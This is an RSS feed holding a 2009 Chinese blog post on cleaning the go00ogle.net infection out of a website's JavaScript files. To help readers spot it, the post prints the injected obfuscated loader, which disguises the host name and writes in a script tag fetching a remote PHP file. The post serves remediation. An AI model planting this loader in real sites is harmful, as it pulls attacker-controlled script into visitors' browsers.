<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>一个故事@MySQL DBA &#187; go00ogle</title>
	<atom:link href="http://www.orczhou.com/index.php/tag/go00ogle/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.orczhou.com</link>
	<description>一个故事@MySQL DBA</description>
	<lastBuildDate>Tue, 20 Dec 2011 15:51:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>遭遇go00ogle.net</title>
		<link>http://www.orczhou.com/index.php/2009/08/remove-go00oglenet/</link>
		<comments>http://www.orczhou.com/index.php/2009/08/remove-go00oglenet/#comments</comments>
		<pubDate>Thu, 06 Aug 2009 00:40:37 +0000</pubDate>
		<dc:creator>orczhou</dc:creator>
				<category><![CDATA[大千世界]]></category>
		<category><![CDATA[go00ogle]]></category>

		<guid isPermaLink="false">http://orczhou.com/?p=533</guid>
		<description><![CDATA[<p>如果你的网站也被挂上了go00ogle.net的恶意代码，那么继续往下看，我们一起来消灭它。</p>
<p>[......]</p><p class='read-more'><a href='http://www.orczhou.com/index.php/2009/08/remove-go00oglenet/'>继续阅读</a></p>]]></description>
			<content:encoded><![CDATA[<p>如果你的网站也被挂上了go00ogle.net的恶意代码，那么继续往下看，我们一起来消灭它。</p>
<p><span id="more-533"></span></p>
<p>如果博客（或网站）不幸被挂上了这个恶意代码，google会把该博客列为危险网站，chrome、firefox也会阻止用户访问，如下图。（不过“幸运”的是IE还可以访问）<br />
<a title="ff报告 by orczhou, on Flickr" href="http://www.flickr.com/photos/26825745@N06/3793140959/"><img src="http://farm3.static.flickr.com/2432/3793140959_869e437b5e_o.jpg" alt="ff报告" width="461" height="299" /></a></p>
<p>根据我自己见到的还有<a href="http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html" target="_blank">网友</a>的经验，代码是通过修改你网站上的javascript脚本文件挂上去的。所以消灭它，你需要知道：</p>
<ol>
<li>什么是javascript文件（.js），并能够用文本编辑器（如写字板）编辑它</li>
<li>如何更新服务器上的javascript文件（.js）</li>
</ol>
<p><br/><br />
<strong><span style="font-family: mceinline;">解决的办法：</span></strong></p>
<ol>
<li>你需要找到你网站上引用的<strong><span style="color: #ff0000;">全部js脚本</span></strong>文件，一般是下面的样子：<br />
&lt;script type="text/javascript" src="/w/skins/common/wikibits.js"&gt;&lt;/script&gt;</li>
<li>下载下来，并全部用写字板打开查看是否包含如下代码（一般会在文件的起始部分）：<br />
<code>function advQuery(){<br />
var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");<br />
document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));<br />
document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));<br />
};advQuery();</code></li>
<li>如果有，则删除这段代码，并更新服务器上的这个js文件。这段代码隐藏的js文件并不是一定的，例如可能是coolcode.js，也可能是<a href="http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html" target="_blank">podpress.js</a>等等。</li>
<li>这样问题就解决了。最后你可能还需要，利用google网站管理员工具，告诉google你的网站已经修复了。参考：<a href="http://www.google.com/support/webmasters/bin/answer.py?answer=45432#3" target="_blank">google网站管理员工具帮助</a>。</li>
</ol>
<p><br/><br />
参考文献：<br />
<a href="http://blog.ambor.com/2009/07/how-to-remove-go00oglenet-infection.html">How to remove a go00ogle.net infection from your WordPress blog</a></p>
<p>(全文完)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.orczhou.com/index.php/2009/08/remove-go00oglenet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

